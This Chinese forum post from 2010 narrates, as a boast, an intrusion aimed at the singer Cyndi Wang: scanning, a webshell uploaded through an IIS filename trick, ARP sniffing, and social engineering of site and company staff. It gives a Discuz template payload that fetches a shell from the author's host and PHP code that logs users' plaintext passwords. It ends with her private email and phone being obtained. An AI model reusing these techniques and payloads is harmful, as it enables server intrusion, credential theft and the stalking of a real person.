|
|
From:www.3est.com
Author:Mars
前幾天,聽說Cyndi出新專輯了,哥好激動啊..聽了幾天Music.突然萌發(fā)了個思想!想了解更多的有關(guān)于她的資料.下面一出好戲即將上演!
總共有三個步驟 :1.先分析 2.再踩點 3.最后滲透
拿到一個目標(biāo)要先學(xué)會分析,首先Cyndi是位明星,所以利用搜索引擎是不可能搜索到什么有價值的信息.
一般明星在網(wǎng)絡(luò)上都有自己的Fans基地,好吧.目標(biāo)已經(jīng)確定了!
通過百度搜索到一個她留言過的Fans基地www.CyndiFans.net
既然目標(biāo)確定了,該執(zhí)行第二步了.去ip.3est.com 反查詢一下它所在的服務(wù)器上還有其他站點沒!查詢結(jié)果如下:
![]()
大概看了下,基本都采用Dz7.0+Uchome+SiteSuper7.5 組合!
手里又沒0day.所以沒抱有太大希望.只好采用ARP方式來看看能獲得什么有價值的信息,首先得先獲得C段一臺服務(wù)器權(quán)限,
拿出平時常用的Hscan 來掃描一下有C段沒有Ftp弱口令.
悲劇了!竟然一個沒掃出來.接著用IIS利用工具掃描下C段.記錄裝有IIS6.0的服務(wù)器IP
因為他的IP是xx.xx.xx.154 大多數(shù)情況是1或者129作為網(wǎng)關(guān),叫前C段和后C段,154距離129比較,所以目標(biāo)放在129-255之間!
然后進入cn.bing.com輸入ip:xx.xx.xx.xx 搜索下后C段裝有IIS6.0的服務(wù)器IP 看看有什么站.一般各類型網(wǎng)站多的的就是虛擬主機,排除掉這些,
就剩下2臺主機了..汗 真郁悶..那么集中精力看看其中一臺xx人才網(wǎng),wwwscan掃描下沒掃描到有價值東西,進入網(wǎng)站轉(zhuǎn)悠了半天,
在他的分站點了個圖片屬性,路徑是ewe我猜想了下應(yīng)該是Ewebeditor這個編輯器,輸入ewe/admin/admin_login.asp 發(fā)現(xiàn)后臺被刪了,
數(shù)據(jù)庫是默認的先下載下來看看有沒有被人搞過,結(jié)果失望了.運氣不怎么好..先休息下再搞了..去群里聊了會天
過幾個小時,來了精神.繼續(xù)在它的網(wǎng)站轉(zhuǎn)悠,我覺得問題最多的還是上傳的地方,就注冊了個會員.進入管理中心沒有發(fā)現(xiàn)什么上傳的位置,
接著又注冊了個企業(yè)會員.發(fā)現(xiàn)了個上傳企業(yè)照片的地方.把小馬改成1.asp;.jpg格式結(jié)果上傳成功了.沒提示路徑.用抓包工具看一下.
總算見到可愛的小馬..拿到webshell之后,開始提權(quán),結(jié)果那破服務(wù)器慢的要死.開個高速VPN,速度果然提升了.隨便看了下感覺提權(quán)無望.
.基本組建都被卸載了.目錄還不能查看.有SU不過是9.1版本沒溢出漏洞.唉 權(quán)限配置的很死.看來管理員挺懂安全啊.看了下配置文件最后發(fā)現(xiàn)個sa,
哈哈 激動死了!直接加系統(tǒng)用戶拿到服務(wù)器權(quán)限.然后更變態(tài)的事情發(fā)生了.進去看任務(wù)管理器竟然CPU100%總共運行72個進程..
我的天啊…這么破爛的服務(wù)器一ARP不就掛掉了.我一個一個把沒用的進程結(jié)束掉.到30個進程了.在結(jié)束服務(wù)器就掛了.
然后打開我的電腦管理想看看這服務(wù)器是什么高級配置.結(jié)果點了屬性Shell32.dl被禁,進C盤彈出拒絕訪問..打開網(wǎng)頁不讓下載東西..
一系列的問題皆然發(fā)生!終于把Cain放到服務(wù)器了.還好不出我所預(yù)料.這個服務(wù)器網(wǎng)關(guān)是129. 哈哈只能掃到后C段的服務(wù)器Mac .
然后開始ARP 154這個主機,嗅探開始了.他服務(wù)器裝有ARP防火墻軟件把發(fā)送的數(shù)據(jù)給攔截了..
這時候想起玫瑰的ARP突破方法,結(jié)果試驗了下沒成功,后來配合幻境網(wǎng)盾用了下.成功欺騙突破防火墻.終于嗅探到數(shù)據(jù)了,
挺高興的.結(jié)果5秒鐘都沒,Cain卡爆了!服務(wù)器掛了10分鐘我才登錄上.發(fā)現(xiàn)嗅探到的3萬多個Http信息竟然都是盛大傳奇的,
我納悶了會,地址確實是盛大的!
![]()
看了下mssql嗅探到了幾個SA密碼.接著又拿下一臺速度比較好點的服務(wù)器.接著剛才的工作.開始ARP.
我在網(wǎng)站找到管理員的QQ加了他.!
我說:
你好!請問你是cyndifans.net的管理么 ?
NiKai:
恩
我說
我的賬戶丟失了怎么辦 能幫我找回下么 ?
NiKai:
請問你用戶名是?
我說:
christa
NiKai :
請使用找回密碼功能http://www.cyndifans.net/logging.php?action=login
我說:
我以前的電子郵件過期了.
NiKai:
能否告訴我你的注冊時間和最后登錄時間?
我說:
記不起來了。。
NiKai:
大概的
NiKai:
還有電子郵件地址是什么?
NiKai:
郵件地址
我說:
以前注冊的christa@163.com好像是163還是126..記不大清楚了!
NiKai:
什么時候發(fā)現(xiàn)不能登錄或者發(fā)現(xiàn)忘記密碼的?
我說: (PS:其實我啥信息沒有!去論壇看見個賬戶就隨便說的.快露餡 該轉(zhuǎn)移話題了!)
對了!請問那個會員卡有什么作用 ? 能了解心凌最新消息?
NiKai :
凌盟永久會員
可以通過短信等方式獲取最新消息
以及更多特權(quán)和購買專輯等優(yōu)惠
還有參與活動等優(yōu)先權(quán)
我說:
哦~沒什么別的待遇么。。能得到簽名么
NiKai
預(yù)購專輯有簽名啊
NiKai
重置密碼為:123456 登錄后盡快修改密碼!
我說(PS:哈哈 像想讓我快點加入會員!我就不加氣死你!)
嗯 麻煩你了
NiKai
你要買嗎?會員卡 年后會提價年后價格應(yīng)該在50-68元之間!
我說
我沒辦理網(wǎng)上銀行。。
NiKai
可以銀行轉(zhuǎn)賬
NiKai
我可以給你賬號
我說
嗯,好的!
NiKai
中國工商銀行上海市新靈路支行
受款帳號:10011XXXXX21135XXXX
戶名:XXX
http://www.xxx.com/abouts/payment.php
銀行匯款(到賬時間部分實時,部分1-5工作日)
我說
好的 我打的時候聯(lián)系下你
NiKai
好的!
我說
麻煩了。
成功嗅探到管理員的登錄密碼.接著進入后臺
![]()
在模板任意位置插入
{eval copy('http://www.3est.com/mars.txt', DISCUZ_ROOT.'./forumdata/shell.php');
然后更新緩存.結(jié)果他的緩存目錄竟然無寫入權(quán)限…
![]()
沒辦法了
在后臺查看了Cyndi的注冊資料和最后登錄IP地址.IP138查一下是臺灣的.這差不多就是她家IP了.光拿到這個還不夠, 繼續(xù)滲透…主要是拿Cyndi的密碼,那只有Webshell或者服務(wù)器權(quán)限的情況下才能拿下數(shù)據(jù)庫.這是一件比較難的差事.ARP到3389登錄密碼成功率很低的.只嗅探Ftp Mysql RDP ,過了2天嗅探出FTP了
![]()
成功登錄FTP之后,傳個webshell
![]() ![]()
結(jié)果服務(wù)器權(quán)限很死,ping 下是su8的FTP
然后通過 空虛浪子心寫的EXP提到服務(wù)器!
然后BT的事情出現(xiàn)了。
C盤沒訪問權(quán)限,打開屬性提升用戶組
這個服務(wù)器安全做的不錯,一堆東西沒權(quán)限運行。
既然這樣,在看看注冊表是否被封鎖了。什么都不讓下載,更別說復(fù)制了。
只能靠WebShell上傳個cmd.exe來克隆下超級管理
至此,第一階段滲透完畢!
去數(shù)據(jù)庫找王心凌密碼,DZ采用的是salt方式,隨機獲得一個字符串,然后把明文密碼MD5之后,再與隨機字符串連接起來之后,再次MD5。
這樣可極大的提高安全系數(shù)。
只好在記錄明文密碼了。
修改uc_client目錄下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代碼,在網(wǎng)站admin目錄下生成include.txt
$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./admin/include.txt','a+');
$write=fwrite($handle,$record);
![]()
等著王心凌上論壇。
下面做其他工作。
先抓取下管理的Hash
跑出密碼!
繼續(xù)把服務(wù)器數(shù)據(jù)庫連接密碼,緩存密碼,F(xiàn)TP密碼都收集下!
去ip866查詢域名的注冊郵箱是xx@yaho o.cn,然后反查下出現(xiàn)了Cyndi.com.cn這個域名,讓我感到****了。先看看他域名注冊的地方,
一個是新網(wǎng),一個是萬網(wǎng),先解決新網(wǎng)的,百度搜索了下他的信息很散,不過經(jīng)過一下午的搜索基本信息已經(jīng)確定。
接著試了幾個密碼進來了。
很快,把所有密碼整理下,然后猜想下就出來了。
![]()
繼續(xù)搜索資料,找DNS管理頁面
然后社工到QQ密碼,然后進入QQ網(wǎng)絡(luò)硬盤,找有價值信息,成功拿到cyndi.com.cn管理權(quán)限。
經(jīng)過收集資料,在百度貼吧找到她ID,搜狐BLOG 臺灣雅虎BLOG
經(jīng)過調(diào)查發(fā)現(xiàn)那個搜狐BLOG是她的經(jīng)紀(jì)人幫她發(fā)的,
只有翻墻去臺灣BLOG,
![]()
2010-1-13 20:25
收集了點資料,
1、起初為了社工心凌創(chuàng)辦的經(jīng)濟公司的EMAIL,依靠的是雅虎訂閱信息得到EMAIL,然后通過找回密碼,密碼問題是她姓名,更何況我又不知道她是誰,與他們公司的關(guān)系及職位,我猜想,他們公司人數(shù)不會太多,估計也就兩三個。
2、百度找到他們公司電話,打過去,然后說,請問您的貴姓 接著一個女的說 ?好甜美的話語啊,我于是蠢蠢欲動了幾秒,接著說,女士您貴姓,她說姓米,我說 米小姐,請問怎么能夠拿到心凌的簽名,她給我了個電話讓我聯(lián)系一個唱片公司。接著掛電話了
3、過半天之后 再打電話給她經(jīng)濟公司,說請問張XX小姐在么?
4、我聽了語音,是另外個女的接的電話,她說請問你是不是找張小姐,接著找個借口掛了電話!
5、然后登錄Email通過密碼提示找回密碼,輸入姓名,成功進入!
進入郵箱打開通訊錄,拿到了本人的手機,王心凌的私人EMAIL和手機,然后這個密碼正好是她EMAIL的。。就不截圖了,免的被人破壞。
滲透結(jié)束!有時間找她聊聊哈。 |
|
發(fā)表于 2010-1-26 08:04:25
收藏
樓主